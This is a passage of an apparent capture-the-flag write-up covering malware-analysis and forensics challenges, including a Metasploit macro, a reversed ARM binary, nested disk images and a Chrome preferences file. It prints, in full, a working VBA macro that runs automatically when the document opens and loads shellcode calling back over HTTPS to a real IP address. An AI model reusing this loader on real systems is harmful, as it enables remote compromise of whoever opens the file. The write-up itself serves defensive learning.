        Private Declare Function VirtualAlloc Lib &quot;kernel32&quot; (ByVal Rwsmgf As Long, ByVal Yfhfyt As Long, ByVal Gmv As Long, ByVal Fzuyvr As Long) As Long&#13;
        Private Declare Function RtlMoveMemory Lib &quot;kernel32&quot; (ByVal Dsxwyr As Long, ByRef Ulfjrsim As Any, ByVal Qaozt As Long) As Long&#13;
#End If&#13;
&#13;
Sub Auto_Open()&#13;
        Dim Nlgunnv As Long, Zniywf As Variant, Uprurh As Long&#13;
#If VBA7 Then&#13;
        Dim Arbyj As LongPtr, Swyyipid As LongPtr&#13;
#Else&#13;
        Dim Arbyj As Long, Swyyipid As Long&#13;
#End If&#13;
        Zniywf = Array(232, 143, 0, 0, 0, 96, 49, 210, 100, 139, 82, 48, 137, 229, 139, 82, 12, 139, 82, 20, 15, 183, 74, 38, 139, 114, 40, 49, 255, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 73, 117, 239, 82, 139, 82, 16, 87, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, 116, 76, 1, 208, 80, 139, 88, 32, 1, 211, 139, 72, 24, 133, 201, 116, 60, 49, 255, _&#13;
73, 139, 52, 139, 1, 214, 49, 192, 193, 207, 13, 172, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, 36, 117, 224, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, 233, 128, 255, 255, 255, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, _&#13;
104, 76, 119, 38, 7, 255, 213, 49, 219, 83, 83, 83, 83, 83, 232, 62, 0, 0, 0, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 54, 46, 49, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, 55, 46, 48, 59, 32, 114, 118, 58, 49, 49, 46, 48, 41, 32, 108, 105, 107, 101, 32, 71, 101, 99, 107, 111, _&#13;
0, 104, 58, 86, 121, 167, 255, 213, 83, 83, 106, 3, 83, 83, 104, 187, 1, 0, 0, 232, 21, 1, 0, 0, 47, 57, 90, 110, 88, 77, 119, 103, 120, 75, 95, 108, 103, 70, 71, 69, 86, 65, 74, 117, 81, 54, 103, 120, 95, 95, 87, 120, 56, 69, 90, 80, 51, 48, 51, 99, 84, 79, 113, 77, 82, 76, 122, 89, 71, 89, 78, 89, 71, 53, 83, 76, 77, 105, 53, 103, _&#13;
71, 119, 85, 100, 111, 80, 122, 118, 90, 55, 54, 118, 54, 73, 97, 103, 71, 73, 105, 116, 86, 70, 56, 52, 68, 70, 87, 48, 102, 76, 74, 95, 54, 70, 108, 105, 72, 100, 88, 102, 52, 81, 73, 50, 69, 69, 53, 53, 103, 103, 86, 118, 119, 72, 121, 113, 72, 109, 117, 107, 100, 57, 100, 107, 103, 112, 112, 117, 116, 103, 45, 118, 117, 51, 52, 69, 73, 0, 80, 104, _&#13;
87, 137, 159, 198, 255, 213, 137, 198, 83, 104, 0, 50, 232, 132, 83, 83, 83, 87, 83, 86, 104, 235, 85, 46, 59, 255, 213, 150, 106, 10, 95, 104, 128, 51, 0, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 83, 83, 83, 83, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 117, 20, 104, 136, 19, 0, 0, 104, 68, 240, 53, 224, 255, 213, 79, _&#13;
117, 205, 232, 74, 0, 0, 0, 106, 64, 104, 0, 16, 0, 0, 104, 0, 0, 64, 0, 83, 104, 88, 164, 83, 229, 255, 213, 147, 83, 83, 137, 231, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 207, 139, 7, 1, 195, 133, 192, 117, 229, 88, 195, 95, 232, 107, 255, 255, 255, 52, 53, 46, 54, 50, 46, 50, 53, 49, 46, 49, 54, 57, _&#13;
0, 187, 240, 181, 162, 86, 106, 0, 83, 255, 213)&#13;
&#13;
        Arbyj = VirtualAlloc(0, UBound(Zniywf), &amp;amp;H1000, &amp;amp;H40)&#13;
        For Uprurh = LBound(Zniywf) To UBound(Zniywf)&#13;
                Nlgunnv = Zniywf(Uprurh)&#13;
                Swyyipid = RtlMoveMemory(Arbyj + Uprurh, Nlgunnv, 1)&#13;
        Next Uprurh&#13;
        Swyyipid = CreateThread(0, 0, Arbyj, 0, 0, 0)&#13;
End Sub&#13;
Sub AutoOpen()&#13;
        Auto_Open&#13;
End Sub&#13;
Sub Workbook_Open()&#13;
        Auto_Open&#13;
End Sub&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Hm, that array looks &lt;em&gt;very&lt;/em&gt; much like base 10 encoded chars&lt;a id=&quot;fnref1&quot; class=&quot;footnote-ref&quot; href=&quot;#fn1&quot;&gt;&lt;sup&gt;1&lt;/sup&gt;&lt;/a&gt; &amp;ndash; let&amp;rsquo;s check:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ python3&#13;
Python 3.7.3 (default, Jan 22 2021, 20:04:44)&#13;
[GCC 8.3.0] on linux&#13;
Type &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.&#13;
&amp;gt;&amp;gt;&amp;gt; myarray = [ 232, 143, 0, 0, 0, 96, 49, 210, 100, 139, 82, 48, 137, 229, 139, 82, 12, 139, 82, 20, 15, 183, 74, 38, 139, 114, 40, 49, 255, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 73, 117, 239, 82, 139, 82, 16, 87, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, 116, 76, 1, 208, 80, 139, 88, 32, 1, 211, 139, 72, 24, 133, 201, 116, 60, 49, 255,73, 139, 52, 139, 1, 214, 49, 192, 193, 207, 13, 172, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, 36, 117, 224, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, 233, 128, 255, 255, 255, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84,104, 76, 119, 38, 7, 255, 213, 49, 219, 83, 83, 83, 83, 83, 232, 62, 0, 0, 0, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 54, 46, 49, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, 55, 46, 48, 59, 32, 114, 118, 58, 49, 49, 46, 48, 41, 32, 108, 105, 107, 101, 32, 71, 101, 99, 107, 111,0, 104, 58, 86, 121, 167, 255, 213, 83, 83, 106, 3, 83, 83, 104, 187, 1, 0, 0, 232, 21, 1, 0, 0, 47, 57, 90, 110, 88, 77, 119, 103, 120, 75, 95, 108, 103, 70, 71, 69, 86, 65, 74, 117, 81, 54, 103, 120, 95, 95, 87, 120, 56, 69, 90, 80, 51, 48, 51, 99, 84, 79, 113, 77, 82, 76, 122, 89, 71, 89, 78, 89, 71, 53, 83, 76, 77, 105, 53, 103,71, 119, 85, 100, 111, 80, 122, 118, 90, 55, 54, 118, 54, 73, 97, 103, 71, 73, 105, 116, 86, 70, 56, 52, 68, 70, 87, 48, 102, 76, 74, 95, 54, 70, 108, 105, 72, 100, 88, 102, 52, 81, 73, 50, 69, 69, 53, 53, 103, 103, 86, 118, 119, 72, 121, 113, 72, 109, 117, 107, 100, 57, 100, 107, 103, 112, 112, 117, 116, 103, 45, 118, 117, 51, 52, 69, 73, 0, 80, 104,87, 137, 159, 198, 255, 213, 137, 198, 83, 104, 0, 50, 232, 132, 83, 83, 83, 87, 83, 86, 104, 235, 85, 46, 59, 255, 213, 150, 106, 10, 95, 104, 128, 51, 0, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 83, 83, 83, 83, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 117, 20, 104, 136, 19, 0, 0, 104, 68, 240, 53, 224, 255, 213, 79,117, 205, 232, 74, 0, 0, 0, 106, 64, 104, 0, 16, 0, 0, 104, 0, 0, 64, 0, 83, 104, 88, 164, 83, 229, 255, 213, 147, 83, 83, 137, 231, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 207, 139, 7, 1, 195, 133, 192, 117, 229, 88, 195, 95, 232, 107, 255, 255, 255, 52, 53, 46, 54, 50, 46, 50, 53, 49, 46, 49, 54, 57,0, 187, 240, 181, 162, 86, 106, 0, 83, 255, 213]&#13;
&amp;gt;&amp;gt;&amp;gt; output = ''&#13;
&amp;gt;&amp;gt;&amp;gt; for i in myarray:&#13;
...   output += chr(i)&#13;
...&#13;
&amp;gt;&amp;gt;&amp;gt; print(output)&#13;
&amp;egrave;`1&amp;Ograve;dR0&amp;aring;R&#13;
&amp;not;&amp;Ccedil;8&amp;agrave;u&amp;ocirc;}&amp;oslash;;}$u&amp;agrave;XX$&amp;Oacute;f &amp;Oacute;H&amp;Eacute;t&amp;lt;1&amp;yuml;I4&amp;Ouml;1&amp;Agrave;&amp;Aacute;&amp;Iuml;&#13;
                  KX&amp;Oacute;&amp;ETH;D$$[[aYZQ&amp;yuml;&amp;agrave;X_Z&amp;eacute;&amp;yuml;&amp;yuml;&amp;yuml;]hnethwiniThLw&amp;amp;&amp;yuml;&amp;Otilde;1&amp;Ucirc;SSSSS&amp;egrave;&amp;gt;Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Geckoh:Vy&amp;sect;&amp;yuml;&amp;Otilde;SSjSSh&amp;raquo;&amp;egrave;/9ZnXMwgxK_lgFGEVAJuQ6gx__Wx8EZP303cTOqMRLzYGYNYG5SLMi5gGwUdoPzvZ76v6IagGIitVF84DFW0fLJ_6FliHdXf4QI2EE55ggVvwHyqHmukd9dkgpputg-vu34EIPhW&amp;AElig;&amp;yuml;&amp;Otilde;&amp;AElig;Sh2&amp;egrave;SSSWSVh&amp;euml;U.;&amp;yuml;&amp;Otilde;j&#13;
_h3&amp;agrave;jPjVhuF&amp;yuml;&amp;Otilde;SSSSVh-{&amp;yuml;&amp;Otilde;&amp;Agrave;uhhD&amp;eth;5&amp;agrave;&amp;yuml;&amp;Otilde;Ou&amp;Iacute;&amp;egrave;Jj@hh@ShX&amp;curren;S&amp;aring;&amp;yuml;&amp;Otilde;SS&amp;ccedil;Wh SVh&amp;acirc;&amp;yuml;&amp;Otilde;&amp;Agrave;t&amp;Iuml;&amp;Atilde;&amp;Agrave;u&amp;aring;X&amp;Atilde;_&amp;egrave;k&amp;yuml;&amp;yuml;&amp;yuml;45.62.251.169&amp;raquo;&amp;eth;&amp;micro;&amp;cent;VjS&amp;yuml;&amp;Otilde;&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Ok, not a pure string, but we definitely see a user agent and an IP address &lt;code&gt;45.62.251[.]169&lt;/code&gt; and this is our answer.&lt;/p&gt;&#13;
&lt;h3 id=&quot;secret-document-23&quot;&gt;Secret document (2/3)&lt;/h3&gt;&#13;
&lt;p&gt;The basic text and file are the same, but this time our task is:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;Can you find out which protocol is used to retrieve the secrets?&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;As we&amp;rsquo;ve already found a user agent in the above output, we were pretty sure that it would be either HTTP or HTTPS and the latter was the correct answer.&lt;/p&gt;&#13;
&lt;h3 id=&quot;secret-document33&quot;&gt;Secret document(3/3)&lt;/h3&gt;&#13;
&lt;p&gt;Our final task is&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;It seems that we have been fooled and that this document was actually malicious.&lt;/p&gt;&#13;
&lt;p&gt;Can you find out which framework was used to generate the malicious payload?&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;We weren&amp;rsquo;t sure how to tackle this and the end of the challenge was near, so we simply guessed &quot;metasploit&quot; which was correct.&lt;/p&gt;&#13;
&lt;h3 id=&quot;file-in-the-wild-12&quot;&gt;File in the wild (1/2)&lt;/h3&gt;&#13;
&lt;p&gt;We get a file and are told:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;What is the flag?&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;At first, there&amp;rsquo;s not much this file tells us about itself:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ file suspectfile&#13;
suspectfile: data&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;However, when looking at the end of the file, we see the following:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ xxd suspectfile | tail -n 5&#13;
000009e0: 38b7 5bda 7fb8 9f6d 6fb5 976d 5484 3828  8.[....mo..mT.8(&#13;
000009f0: 636a 6301 ff1a 6d27 02d8 1f3b 9511 238a  cjc...m'...;..#.&#13;
00000a00: 5c9b 886c 18da f1b6 3636 77b3 7f15 c714  \..l....66w.....&#13;
00000a10: 6c6f 59ed 0079 7261 6e69 6279 6d03 0060  loY..yranibym..`&#13;
00000a20: 8589 b708 088b 1f                        .......&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;And &lt;code&gt;yranibym&lt;/code&gt; is &quot;mybinary&quot; reversed, so this seems to be a hint. We wrote a quick Python script to reverse the reversion:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;file = open(&quot;suspectfile&quot;, 'rb')&#13;
reverse_me = []&#13;
byte = file.read(1)&#13;
while byte:&#13;
    reverse_me.append(byte)&#13;
    byte = file.read(1)&#13;
reverse_me = reversed(reverse_me)&#13;
with open('sample', 'wb') as f:&#13;
    for byte in reverse_me:&#13;
        f.write(byte)&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;And, did it help?&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ file sample&#13;
sample: gzip compressed data, was &quot;mybinary&quot;, last modified: Sun Apr 25 15:24:39 2021, from Unix, original size modulo 2^32 8096&#13;
$ mv sample{,.gz} &amp;amp;&amp;amp; gunzip sample.gz&#13;
$ file sample&#13;
sample: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux-armhf.so.3, for GNU/Linux 3.2.0, BuildID[sha1]=3fd9004e328d4fc9efeb43cafc723d6537619610, not stripped&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Well, that&amp;rsquo;s definitely better! Let&amp;rsquo;s look for the flag:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ strings sample | grep flag&#13;
flag:9d2rfLBi7KtyhaYyUZXbe34aJsgz90kldFFFFFFFg&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;h2 id=&quot;forensics&quot;&gt;Forensics&lt;/h2&gt;&#13;
&lt;p&gt;This section had three challenges and we solved all of them.&lt;/p&gt;&#13;
&lt;h3 id=&quot;russian-dolls-12&quot;&gt;Russian Dolls (1/2)&lt;/h3&gt;&#13;
&lt;p&gt;We get an archive and the following info:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;Can you find the secret file?&lt;/p&gt;&#13;
&lt;p&gt;We have received from our secret agent 007 this archive that contains a top secret sentence to save the world.&lt;/p&gt;&#13;
&lt;p&gt;Can you find your way through the archive? (SHA1: &lt;code&gt;cf276efbcdb41cd9541d274e608ea4cc6e6635b7&lt;/code&gt;)&lt;/p&gt;&#13;
&lt;p&gt;This is your mission!&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;First, let&amp;rsquo;s see:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ tar -tf GoldenEye.tgz&#13;
GoldenEye.dd&#13;
$ tar -xf GoldenEye.tgz&#13;
$ sudo losetup -f GoldenEye.dd&#13;
NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&#13;
loop0    7:0    0  3.7G  0 loop&#13;
[snip]&#13;
$ sudo partprobe /dev/loop0&#13;
$ lsblk&#13;
NAME      MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&#13;
loop0       7:0    0  3.7G  0 loop&#13;
└─loop0p1 259:0    0  3.7G  0 part&#13;
$ sudo mount /dev/loop0p1 /mnt/&#13;
$ cd /mnt&#13;
$ ls&#13;
decodeme.7z  lost+found  pic1.jpg  pic2.png  pic3.jpeg  pic4.jpg  pic5.jpeg  pic6.jpg&#13;
$ ls -lh decodeme.7z&#13;
-rw-rw-r-- 1 user user 437M May 12 12:06 decodeme.7z&#13;
$ cp decodeme.7z ~/first-ctf-2021/forensics&#13;
$ cd -&#13;
~/first-ctf-2021/forensics&#13;
$ ls&#13;
decodeme.7z  E2-ECE4X0Ac2ke9.jpeg  ghidra  GoldenEye.dd  goldeneye.sha  GoldenEye.tgz&#13;
$ 7z l decodeme.7z                                                                                         7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21&#13;
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Core(TM) i7-10875H CPU @ 2.30GHz (A0652),ASM,AES-NI)&#13;
&#13;
Scanning the drive for archives:&#13;
1 file, 457303090 bytes (437 MiB)&#13;
&#13;
Listing archive: decodeme.7z&#13;
&#13;
--&#13;
Path = decodeme.7z&#13;
Type = 7z&#13;
Physical Size = 457303090&#13;
Headers Size = 178&#13;
Method = LZMA2:24 7zAES&#13;
Solid = -&#13;
Blocks = 1&#13;
&#13;
   Date      Time    Attr         Size   Compressed  Name&#13;
------------------- ----- ------------ ------------  ------------------------&#13;
2021-05-12 12:02:45 ....A   1023410176    457302912  secretContainer.dd&#13;
------------------- ----- ------------ ------------  ------------------------&#13;
2021-05-12 12:02:45         1023410176    457302912  1 files&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;However, when trying to decompress it, we&amp;rsquo;re ask for a password we don&amp;rsquo;t have, so let&amp;rsquo;s check the images. All of them have a common topic: russian dolls &amp;ndash; thus, after trying a few versions &amp;ldquo;RussianDoll&amp;rdquo; worked and the archive was decompressed.&lt;/p&gt;&#13;
&lt;p&gt;Rinse and repeat: Set up loop devices, mount the container and check what&amp;rsquo;s inside: The next two steps contain MBR-formatted disks called &lt;code&gt;MyDear.dmg&lt;/code&gt; and within it &lt;code&gt;MyPrecious.dmg&lt;/code&gt; and inside it we find &lt;code&gt;flag.txt&lt;/code&gt;:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ cat flag.txt&#13;
From Russia with Love&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;And that is our flag :)&lt;/p&gt;&#13;
&lt;h3 id=&quot;russian-dolls-22&quot;&gt;Russian Dolls (2/2)&lt;/h3&gt;&#13;
&lt;p&gt;The general text is the same as above, but now we have the following task:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;We have learned that a second hidden sentence is somewhere stored in a file metadata. Have a look and don&amp;rsquo;t forget to check for specific filesystem artifacts.&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;After initially wasting a lot of time using sleuthkit tools to find anything in the actual metadata, we started checking for filesystem specific files and again in the &lt;code&gt;MyPrecious.dmg&lt;/code&gt; we finally found what we were looking for:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ mmls MyPrecious.dmg&#13;
GUID Partition Table (EFI)&#13;
Offset Sector: 0&#13;
Units are in 512-byte sectors&#13;
&#13;
      Slot      Start        End          Length       Description&#13;
000:  Meta      0000000000   0000000000   0000000001   Safety Table&#13;
001:  -------   0000000000   0000000039   0000000040   Unallocated&#13;
002:  Meta      0000000001   0000000001   0000000001   GPT Header&#13;
003:  Meta      0000000002   0000000033   0000000032   Partition Table&#13;
004:  000       0000000040   0000499999   0000499960   disk image&#13;
005:  -------   0000500000   0000500039   0000000040   Unallocated&#13;
$ fls -o 0000000040 MyPrecious.dmg&#13;
r/r 3:  $ExtentsFile&#13;
r/r 4:  $CatalogFile&#13;
r/r 5:  $BadBlockFile&#13;
r/r 6:  $AllocationFile&#13;
r/r 8:  $AttributesFile&#13;
r/r 22: .DS_Store&#13;
d/d 20: .fseventsd&#13;
d/d 19: .HFS+ Private Directory Data^&#13;
r/r 16: .journal&#13;
r/r 17: .journal_info_block&#13;
r/r 23: flag.txt&#13;
d/d 18: ^^^^HFS+ Private Data&#13;
$ icat -o 0000000040 MyPrecious.dmg 16 | strings | sed -e 's/Z\+/Z/g'&#13;
xLNJxV4&#13;
Z&#13;
jrnlhfs+P&#13;
jrnlhfs+P&#13;
HFSJ&#13;
ZH+&#13;
HFSJ&#13;
jrnlhfs+P&#13;
jrnlhfs+P&#13;
Z&#13;
        @&#13;
jrnlhfs+P&#13;
jrnlhfs+P&#13;
HFSJ&#13;
X@R&#13;
Z&#13;
        @&#13;
jrnlhfs+P&#13;
jrnlhfs+P&#13;
HFSJ&#13;
=???Z&#13;
        @&#13;
jrnlhfs+P&#13;
jrnlhfs+P&#13;
HFSJ&#13;
Z&#13;
The World Is Not Enough&#13;
        @&#13;
jrnlhfs+P&#13;
jrnlhfs+P&#13;
HFSJ&#13;
Z&#13;
        @&#13;
jrnlhfs+P&#13;
jrnlhfs+P&#13;
HFSJ&#13;
Z&#13;
        @&#13;
jrnlhfs+P&#13;
jrnlhfs+P&#13;
HFSJ&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;And &amp;ldquo;The World Is Not Enough&amp;rdquo; was the solution. We have no idea why HFS+ journals contain so many &amp;rsquo;Z&amp;rsquo;s, but they do, so we filtered them out using &lt;code&gt;sed&lt;/code&gt;, in case you wonder ;)&lt;/p&gt;&#13;
&lt;h3 id=&quot;crhome-matser&quot;&gt;Crhome Matser&lt;/h3&gt;&#13;
&lt;p&gt;We got a file and the following task:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;During a forensic investigation of an end user&amp;rsquo;s Linux machine you find a master preferences file. Your colleague couldn&amp;rsquo;t get the file to load properly. See if you can.&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;So let&amp;rsquo;s have a look at this:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ file master_preferences&#13;
master_preferences: JSON data&#13;
$ jq . master_preferences&#13;
{&#13;
  &quot;homepage&quot;: &quot;http://www.google.com&quot;,&#13;
  &quot;homepage_is_newtabpage&quot;: false,&#13;
  &quot;browser&quot;: {&#13;
    &quot;show_home_button&quot;: true&#13;
  },&#13;
  &quot;session&quot;: {&#13;
    &quot;restore_on_startup&quot;: 4,&#13;
    &quot;startup_urls&quot;: [&#13;
      &quot;http://www.google.com/ig&quot;&#13;
    ]&#13;
  },&#13;
  &quot;bookmark_bar&quot;: {&#13;
    &quot;show_on_all_tabs&quot;: true&#13;
  },&#13;
  &quot;sync_promo&quot;: {&#13;
    &quot;show_on_first_run_allowed&quot;: false&#13;
  },&#13;
  &quot;distribution&quot;: {&#13;
    &quot;import_bookmarks_from_file&quot;: &quot;bookmarks.html&quot;,&#13;
    &quot;import_bookmarks&quot;: true,&#13;
    &quot;import_history&quot;: true,&#13;
    &quot;import_home_page&quot;: true,&#13;
    &quot;import_search_engine&quot;: true,&#13;
    &quot;ping_delay&quot;: 60,&#13;
    &quot;suppress_first_run_bubble&quot;: true,&#13;
    &quot;do_not_create_desktop_shortcut&quot;: true,&#13;
    &quot;do_not_create_quick_launch_shortcut&quot;: true,&#13;
    &quot;do_not_launch_chrome&quot;: true,&#13;
    &quot;do_not_register_for_update_launch&quot;: true,&#13;
    &quot;make_chrome_default&quot;: true,&#13;
    &quot;make_chrome_default_for_user&quot;: true,&#13;
    &quot;suppress_first_run_default_browser_prompt&quot;: true,&#13;
    &quot;system_level&quot;: true,&#13;
    &quot;verbose_logging&quot;: true&#13;
  },&#13;
  &quot;first_run_tabs&quot;: [&#13;
    &quot;http://www.example.com&quot;,&#13;
    &quot;http://welcome_page&quot;,&#13;
    &quot;http://new_tab_page&quot;&#13;
  ],&#13;
  &quot;external_crx&quot;: &quot;https://pastebin.com/s2cZFLUi&quot;,&#13;
  &quot;external_version&quot;: &quot;1.0&quot;&#13;
}&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Ok, so what&amp;rsquo;s in the paste? We find:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;00000000: 4372 3234 0300 0000 4502 0000 12ac 040a  Cr24....E.......&#13;
00000010: a602 3082 0122 300d 0609 2a86 4886 f70d  ..0..&quot;0...*.H...&#13;
00000020: 0101 0105 0003 8201 0f00 3082 010a 0282  ..........0.....&#13;
00000030: 0101 00c6 a2a9 8c2a 49f5 f32b eef7 c420  .......*I..+...&#13;
00000040: 2473 5e64 f88a 4a4c d2bf 9728 0074 1a98  $s^d..JL...(.t..&#13;
00000050: 8865 05ed 4137 3841 5f5f 0497 01bb fd3e  .e..A78A__.....&amp;gt;&#13;
00000060: c708 90dd 8833 ff6a 608e 1c38 b87a d426  .....3.j`..8.z.&amp;amp;&#13;
00000070: 07ce 320f c1e3 1b66 77d7 4a87 5e7b cd61  ..2....fw.J.^{.a&#13;
00000080: 32b7 8ec6 8c05 7272 3f11 f474 63f4 ce70  2.....rr?..tc..p&#13;
00000090: 45c3 91e6 a564 356d 0365 fc99 9f78 b9f5  E....d5m.e...x..&#13;
000000a0: 1444 bf70 8fd6 0d5a a747 a913 f94e ed44  .D.p...Z.G...N.D&#13;
000000b0: aa45 eefe 862b 8046 946c 207a cc49 6970  .E...+.F.l z.Iip&#13;
000000c0: 2faa 31d4 978a 5f03 c308 4caa 9d07 6276  /.1..._...L...bv&#13;
000000d0: 0a96 1469 2cb5 856c ea94 adfd 4502 f410  ...i,..l....E...&#13;
000000e0: 4369 0930 b0fe fbfd 193f 5c31 acef 4228  Ci.0.....?\1..B(&#13;
000000f0: 4384 f9d2 3009 b42b b8c6 2704 0167 9036  C...0..+..'..g.6&#13;
00000100: be20 4ff3 60cb a88e 5563 2aa8 85b7 b8a5  . O.`...Uc*.....&#13;
00000110: 6452 100e 42c3 3f0f 37dd 90ca 51a1 1001  dR..B.?.7...Q...&#13;
00000120: 7210 ff40 459a 0ffd 886c cd1b d6d5 4e6d  r..@E....l....Nm&#13;
00000130: c97f 5302 0301 0001 1280 021d 2795 6e4c  ..S.........'.nL&#13;
00000140: b38d e51f a98b 30d2 92c7 b39d fbdb e0f5  ......0.........&#13;
00000150: c307 d4c2 9423 f239 c03e 974a bdc1 e745  .....#.9.&amp;gt;.J...E&#13;
00000160: e5b7 a849 e275 c6b5 a0ea 892a 707d bd5e  ...I.u.....*p}.^&#13;
00000170: d16f 282c 5948 c65c b4d9 2d42 f6b6 5b29  .o(,YH.\..-B..[)&#13;
00000180: e658 9037 fc44 44fa 295a 9e92 4408 515b  .X.7.DD.)Z..D.Q[&#13;
00000190: 719e 7014 bd3b 9d42 9e71 2406 63ae 42a2  q.p..;.B.q$.c.B.&#13;
000001a0: 7e91 c2c9 8400 76c9 edbe 37be 94ee 0aa8  ~.....v...7.....&#13;
000001b0: cd21 dd7b f175 5238 ca39 3a82 320b 402a  .!.{.uR8.9:.2.@*&#13;
000001c0: 62ba 6bad 397d c90f b060 39c2 f81e f9b0  b.k.9}...`9.....&#13;
000001d0: 9ce6 b750 e086 226b 11b4 5525 17d3 62da  ...P..&quot;k..U%..b.&#13;
000001e0: 00a1 92d6 60de fabc 4af9 5278 7d01 8913  ....`...J.Rx}...&#13;
000001f0: b28c e399 12c1 454d 4207 5f92 8e4b 71fd  ......EMB._..Kq.&#13;
00000200: 19e7 1a1b 0e63 c008 e817 512f a7d8 0e45  .....c....Q/...E&#13;
00000210: 5c95 e06d d23e 9af7 f4f3 57e7 4196 1b2a  \..m.&amp;gt;....W.A..*&#13;
00000220: 165f 9624 8a17 cb91 d398 188a ffd1 9e64  ._.$...........d&#13;
00000230: 32a6 237d d099 8316 38ea 9982 f104 120a  2.#}....8.......&#13;
00000240: 1018 849b 4bfd edcb a144 5824 ce62 3b6d  ....K....DX$.b;m&#13;
00000250: f250 4b03 0414 0000 0808 0005 9932 508d  .PK..........2P.&#13;
00000260: 9ca8 efee 0300 00e9 0300 0008 0000 0069  ...............i&#13;
00000270: 636f 6e2e 706e 6701 e903 16fc 8950 4e47  con.png......PNG&#13;
00000280: 0d0a 1a0a 0000 000d 4948 4452 0000 0013  ........IHDR....&#13;
00000290: 0000 0013 0806 0000 0072 5036 cc00 0003  .........rP6....&#13;
000002a0: b049 4441 5438 11bd c17d 4cd4 751c c0f1  .IDAT8...}L.u...&#13;
000002b0: cffd 7edf dfc1 8596 80b5 9d20 4e86 732e  ..~........ N.s.&#13;
000002c0: 2506 62c8 7c0a 1f16 1a6c 4854 16c1 2c56  %.b.|....lHT..,V&#13;
000002d0: 9ad8 4492 871c 88a4 26a7 079e b001 c993  ..D.....&amp;amp;.......&#13;
000002e0: 9808 4426 1707 5ef1 24a0 e650 d3a9 9b5a  ..D&amp;amp;..^.$..P...Z&#13;
000002f0: ad89 acd6 7c5e 9334 d077 adad cd39 6bf5  ....|^.4.w...9k.&#13;
00000300: 8faf 973c 1ea7 c55f 6e48 ac1a f04a b7f6  ....&#13;
000003a0: 958e 9f4a e561 3345 2cfd a22e 94c6 6bb8  ...J.a3E,.....k.&#13;
